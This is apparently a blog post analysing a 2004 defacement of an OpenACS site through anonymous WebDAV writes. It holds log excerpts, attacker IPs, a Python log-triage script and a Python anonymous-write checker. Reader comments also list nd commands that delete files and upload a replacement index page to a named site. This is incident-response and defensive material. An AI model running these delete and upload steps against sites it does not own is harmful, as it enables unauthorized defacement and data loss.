
Notes on Getting Owned

posted Dec 19, 2008, 4:07 PM by Jade Rubick
These are some notes on getting hacked. They show how the safe4all.org server got hacked: the site's WebDAV support (OpenACS's oacs-dav package, which, as the comments below point out, applies no access filters unless the tdav sections are configured in config.tcl) let a client PUT and DELETE files under the document root without logging in, and that is how the defacement page got there. The "Microsoft Data Access Internet Publishing Provider DAV" user agent in the log lines below is the built-in Windows WebDAV client. Here's the vulnerability they exploited: http://openacs.org/forums/message-view?message_id=195894


safe4all.log.2004-07-27-00:00:200.153.243.141 - - [26/Jul/2004:07:22:26 -0700] "PUT /hbr.htm HTTP/1.0" 201 275 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -

safe4all.log.2004-07-31-00:00:213.219.122.11 - - [30/Jul/2004:10:55:24 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "Wget/1.9.1" -

safe4all.log.2004-07-31-00:00:164.71.2.5 - - [30/Jul/2004:10:56:19 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" -

safe4all.log.2004-07-31-00:00:207.46.98.60 - - [30/Jul/2004:13:56:21 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "msnbot/0.11 (+http://search.msn.com/msnbot.htm)" -

safe4all.log.2004-08-02-00:00:164.71.2.5 - - [01/Aug/2004:04:28:33 -0700] "GET /hbr.htm HTTP/1.0" 200 15 "" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)" -

safe4all.log.2004-08-02-00:00:82.135.2.64 - - [01/Aug/2004:10:20:52 -0700] "GET /hbr.htm HTTP/1.1" 200 15 "http://www.zone-h.org/defacements/filter/filter_defacer=H4ck3rsBr" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" -

safe4all.log.2004-08-03-00:00:200.153.243.109 - - [02/Aug/2004:09:32:34 -0700] "PUT /hbr.htm HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -

On http://www.zone-h.org/en/defacements/filter/filter_defacer=Hack3rz/ you can see all the defacements by this particular group:

2004/08/01 H4ck3rsBR M safe4all.org/hbr.htm Linux

The initial file: hbr.htm:

H4ck3rsBr Ownz You System...

Rehacked on the 15th:

2004/08/15 Hack3rz H R safe4all.org

A bunch of clueless people trying to figure out what happened:
http://www.parcom.net/forum/topic.asp?TOPIC_ID=1732

It looks like they've broken into a PHP-Nuke site too: http://www.phidelity.com/cms/modules.php?name=News&file=article&sid=30

They claim they don't leave any trojans:
http://mirror.delta5.com.br/2004/07/31/mail.buerger.passau.de/

All the WebDAV PUT requests from the logs. The first two (17 and 18 July) were refused with 404; from 23 July on they succeed. A 201 means the file was created, a 204 that an existing file was overwritten, so each www.arplhmd.cjb.net_NNNNNN pair looks like a write test followed by a second write to the same path. The 14 August requests carry an OpenACS ad_session_id cookie (it decodes to 3614167,0,0 plus a signature; if I read the OpenACS cookie layout right, the zeros are the user_id and login level, so this was an ordinary anonymous session picked up by browsing the site, not a login):
safe4all.log.2004-07-18-00:00:200.158.9.169 - - [17/Jul/2004:16:08:24 -0700] "PUT /fusion.htm HTTP/1.0" 404 547 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-19-00:00:200.158.8.201 - - [18/Jul/2004:19:46:49 -0700] "PUT /h4ck3rsbr.htm HTTP/1.0" 404 547 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-24-00:00:200.162.208.250 - - [23/Jul/2004:04:55:27 -0700] "PUT /www.arplhmd.cjb.net_064133 HTTP/1.0" 201 294 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-24-00:00:200.162.208.250 - - [23/Jul/2004:04:55:27 -0700] "PUT /www.arplhmd.cjb.net_064133 HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-27-00:00:200.153.243.141 - - [26/Jul/2004:07:22:26 -0700] "PUT /hbr.htm HTTP/1.0" 201 275 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-03-00:00:200.153.243.109 - - [02/Aug/2004:09:32:34 -0700] "PUT /hbr.htm HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:13:56:28 -0700] "PUT /www.arplhmd.cjb.net_175955 HTTP/1.0" 201 294 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:00:55 -0700] "PUT /index.html HTTP/1.0" 201 278 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:05:14 -0700] "PUT /default.htm HTTP/1.0" 201 279 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:05:23 -0700] "PUT /default.html HTTP/1.0" 201 280 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:05:33 -0700] "PUT /home.htm HTTP/1.0" 201 276 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:06:15 -0700] "PUT /index.htm HTTP/1.0" 201 277 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.101.38.143 - - [14/Aug/2004:16:49:45 -0700] "PUT /www.arplhmd.cjb.net_205434 HTTP/1.0" 201 294 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-15-00:00:200.101.38.143 - - [14/Aug/2004:17:17:33 -0700] "PUT /www.arplhmd.cjb.net_205434 HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -

Just before uploading the replacement index pages above, the same client deleted the existing index files (a 204 on DELETE means it worked) and then checked with a HEAD, which still answered 200:
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:40 -0700] "DELETE /index.html HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:45 -0700] "DELETE /index.tcl HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"

safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:49 -0700] "DELETE /index.xql HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:57 -0700] "DELETE /index.adp HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:00:20 -0700] "HEAD /index.html HTTP/1.0" 200 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"

Also in the logs that night, though it turned out to be unrelated (see the freenode comment below):
82.96.96.3 - - [14/Aug/2004:20:48:58 -0700] "CONNECT 82.96.96.3:802 HTTP/1.0" 404 547 "" "" -
82.96.96.3 - - [14/Aug/2004:20:48:59 -0700] "POST http://82.96.96.3:802/ HTTP/1.0" 500 540 "" "" -
82.96.96.3 - - [14/Aug/2004:20:48:59 -0700] "CONNECT 82.96.96.3:802 HTTP/1.0" 404 547 "" "" -
82.96.96.3 - - [14/Aug/2004:20:48:59 -0700] "POST http://82.96.96.3:802/ HTTP/1.0" 500 540 "" "" -


IP addresses that sent WebDAV PUT or DELETE requests (the first two only ever got 404s; the rest succeeded):

200.158.9.169
200.158.8.201
200.162.208.250
200.153.243.141
200.153.243.109
200.140.36.237
200.101.38.143

Seen in the same logs but not an attacker (freenode's open-proxy check, explained in Adam Koch's comment below):

82.96.96.3
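A script that does this triage over the logs (an added example, not code from the original post or from OpenACS): it parses lines in the format shown above, including the filename prefix that grep leaves when run over rotated logs and the trailing cookie field, labels each PUT/DELETE by what it achieved (201 created, 204 overwrote or deleted, anything else refused), keeps the CONNECT/absolute-URL proxy probes apart from real writes, and summarises successful writes per source address. The seven sample lines are copied from the excerpts on this page; the function names are my own.

```python
import re
from collections import defaultdict
from datetime import datetime

# HTTP/WebDAV methods that change what the server serves. A 2xx answer to any
# of them from an address you do not recognise is the thing to hunt for.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}

# Combined-style access log line, optionally prefixed with "filename:" as grep
# leaves it when run over several rotated logs, ending in the cookie field (or "-").
LOG_RE = re.compile(
    r'^(?:\S+:)?'
    r'(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ '
    r'\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
    r'(?: (?P<cookie>"[^"]*"|-))?$'
)

def parse_line(line):
    """Split one access-log line into fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["cookie"] = None if rec["cookie"] in (None, "-") else rec["cookie"].strip('"')
    return rec

def classify(rec):
    """Say what a request achieved: created/overwritten/deleted/refused/read/proxy-probe."""
    method, status, target = rec["method"], rec["status"], rec["target"]
    if method == "CONNECT" or target.startswith("http://"):
        return "proxy-probe"      # open-proxy test aimed at the server, not a content change
    if method not in WRITE_METHODS:
        return "read"
    if status == 201:
        return "created"          # a new file was written
    if 200 <= status < 300:
        return "deleted" if method == "DELETE" else "overwritten"   # 204: existing file replaced/removed
    return "refused"              # 401/403/404/405...: the write did not happen

def triage(lines):
    """Parse every line that parses and attach a 'kind' label to each record."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec:
            rec["kind"] = classify(rec)
            out.append(rec)
    return out

def writers(records):
    """Per source IP: time window and (method, path, status, kind) of each successful write."""
    by_ip = defaultdict(lambda: {"first": None, "last": None, "events": []})
    for r in sorted(records, key=lambda r: r["when"]):
        if r["kind"] in ("created", "overwritten", "deleted"):
            e = by_ip[r["ip"]]
            e["first"] = e["first"] or r["when"]
            e["last"] = r["when"]
            e["events"].append((r["method"], r["target"], r["status"], r["kind"]))
    return dict(by_ip)

# Seven lines copied from the log excerpts on this page, so the script runs offline.
SAMPLE = """\
safe4all.log.2004-07-18-00:00:200.158.9.169 - - [17/Jul/2004:16:08:24 -0700] "PUT /fusion.htm HTTP/1.0" 404 547 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-24-00:00:200.162.208.250 - - [23/Jul/2004:04:55:27 -0700] "PUT /www.arplhmd.cjb.net_064133 HTTP/1.0" 201 294 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-24-00:00:200.162.208.250 - - [23/Jul/2004:04:55:27 -0700] "PUT /www.arplhmd.cjb.net_064133 HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-07-27-00:00:200.153.243.141 - - [26/Jul/2004:07:22:26 -0700] "PUT /hbr.htm HTTP/1.0" 201 275 "" "Microsoft Data Access Internet Publishing Provider DAV 1.1" -
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:14:59:40 -0700] "DELETE /index.html HTTP/1.0" 204 0 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
safe4all.log.2004-08-15-00:00:200.140.36.237 - - [14/Aug/2004:15:00:55 -0700] "PUT /index.html HTTP/1.0" 201 278 "" "Microsoft Data Access Internet Publishing Provider DAV" "ad_session_id=3614167%2c0%2c0+%7b313+1092521929+AFE1A1CE4C39886DB8352FB52167F1F92CE039EA%7d"
82.96.96.3 - - [14/Aug/2004:20:48:58 -0700] "CONNECT 82.96.96.3:802 HTTP/1.0" 404 547 "" "" -
"""

if __name__ == "__main__":
    recs = triage(SAMPLE.splitlines())
    for ip, e in writers(recs).items():
        print(ip, e["first"].isoformat(), "->", e["last"].isoformat())
        for ev in e["events"]:
            print("   ", *ev)
```

Run it over `grep -h PUT\\|DELETE safe4all.log.*` output (or over the whole logs; non-matching lines are skipped) and compare the addresses it prints against the ones you expect to be publishing to your site.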


Comments:

How to check that your site is vulnerable

matthewg: another way is to install nd (apt-get install nd) then do this:
matthewg: nd -v http://www.safe4all.org/*
matthewg: If it gives a listing of your files then you haven't fixed it.

by Jade Rubick on 08/16/04

more notes from matthewg and aegrumet

Then I can simply start deleting things like this:

# nd -d http://www.thedesignexperience.org/test.adp~
# nd -d http://www.thedesignexperience.org/index-old.adp
# nd -d http://www.thedesignexperience.org/index-old.tcl

etc. Then I can upload a new index.html by doing this:

# nd -p ~/nasty-index.html -T application/x-www-form-urlencode http://www.thedesignexperience.org/index.html

ah, in case anyone cares: if you don't have the tdav sections configured in the config.tcl then no filters are applied, see packages/oacs-dav/tcl/tDAV-procs.tcl

by Jade Rubick on 08/16/04
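The check from the two comments above as a small script (an added example; it is not nd, and not OpenACS code): check_webdav sends OPTIONS, then an anonymous PROPFIND with Depth: 1, which is the directory listing that `nd -v http://host/*` prints, and, only when write_probe=True, PUTs a uniquely named marker file and DELETEs it again, the same thing the nd -p / nd -d commands do by hand. Because it has to run offline here, it ships with a constructed stand-in server (_OpenDavStub, my own) that behaves like the mis-configured root: any client may list, PUT and DELETE. Point check_webdav at your own server instead, and only use write_probe=True on a host you own.

```python
import http.client
import re
import threading
import uuid
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse

def _request(url, method, body=None, headers=None):
    """One unauthenticated request; returns (status, lower-cased headers, body text)."""
    u = urlparse(url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    conn.request(method, u.path or "/", body=body, headers=headers or {})
    resp = conn.getresponse()
    text = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, {k.lower(): v for k, v in resp.getheaders()}, text

def check_webdav(url, write_probe=False):
    """What can an anonymous client do at url? Listing via PROPFIND is the same
    test as `nd -v url/*`; the write probe (off by default) PUTs a uniquely
    named marker file and deletes it again if the PUT succeeded."""
    report = {"dav": None, "allow": [], "listing": [], "anon_put": None}
    _, hdrs, _ = _request(url, "OPTIONS")
    report["dav"] = hdrs.get("dav")
    report["allow"] = [m.strip().upper() for m in hdrs.get("allow", "").split(",") if m.strip()]
    status, _, body = _request(url, "PROPFIND", headers={"Depth": "1"})
    if status == 207:   # Multi-Status: the server listed the collection for us
        report["listing"] = re.findall(r"<(?:\w+:)?href>([^<]+)</(?:\w+:)?href>", body)
    if write_probe:
        marker = url.rstrip("/") + "/dav-write-check-" + uuid.uuid4().hex + ".txt"
        status, _, _ = _request(marker, "PUT", body=b"dav write check\n",
                                headers={"Content-Type": "text/plain"})
        report["anon_put"] = status in (200, 201, 204)
        if report["anon_put"]:
            _request(marker, "DELETE")   # clean up; a 204 here confirms anonymous DELETE too
    return report

def is_exposed(report):
    """True when anonymous listing or an anonymous write worked. The Allow header
    alone is not proof: a server may advertise PUT but still demand credentials."""
    return bool(report["listing"]) or report["anon_put"] is True

# Constructed stand-in for a mis-configured DAV root (no auth check anywhere),
# so the check can be exercised offline.
class _OpenDavStub(BaseHTTPRequestHandler):
    files = {"/index.html", "/hbr.htm"}        # pretend document root
    def log_message(self, *args):
        pass
    def _reply(self, status, body=b"", ctype=None):
        self.send_response(status)
        if ctype:
            self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def do_OPTIONS(self):
        self.send_response(200)
        self.send_header("DAV", "1")
        self.send_header("Allow", "OPTIONS, GET, HEAD, PUT, DELETE, PROPFIND")
        self.send_header("Content-Length", "0")
        self.end_headers()
    def do_PROPFIND(self):
        hrefs = "".join(f"<D:response><D:href>{p}</D:href></D:response>" for p in sorted(self.files))
        self._reply(207, f'<D:multistatus xmlns:D="DAV:">{hrefs}</D:multistatus>'.encode(), "text/xml")
    def do_PUT(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))
        created = self.path not in self.files
        self.files.add(self.path)
        self._reply(201 if created else 204)    # 201 new file, 204 overwrote, exactly as in the logs
    def do_DELETE(self):
        self.files.discard(self.path)
        self._reply(204)

def start_stub():
    """Serve the stub on a random loopback port; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), _OpenDavStub)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}/"

if __name__ == "__main__":
    srv, base = start_stub()
    rep = check_webdav(base, write_probe=True)
    srv.shutdown()
    print("exposed" if is_exposed(rep) else "ok", rep)
```

A server that is fixed answers the anonymous PROPFIND with 401 or 403 (or 405 if DAV is off) and the PUT with 401/403, so both listing and anon_put stay empty.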

freenode.net

Regarding:

> 82.96.96.3 - - [14/Aug/2004:20:48:58 -0700] "CONNECT 82.96.96.3:802 HTTP/1.0"

That's proxy-testing from freenode.net, triggered by somebody at your location using IRC. You can either tell that person (and maybe everybody else there too?) to stop using IRC, or contact freenode.net and they'll block connections. Freenode might claim that they can do this proxy-detection because your user agreed to their EULA. I didn't see the logic in that, since most end-users can't speak on behalf of the server owners, but that's another story... :) Anyway, in short, the above item appearing in a web server log is not somebody trying to hack. freenode.net's policy page has more info.

by Adam Koch on 04/28/05
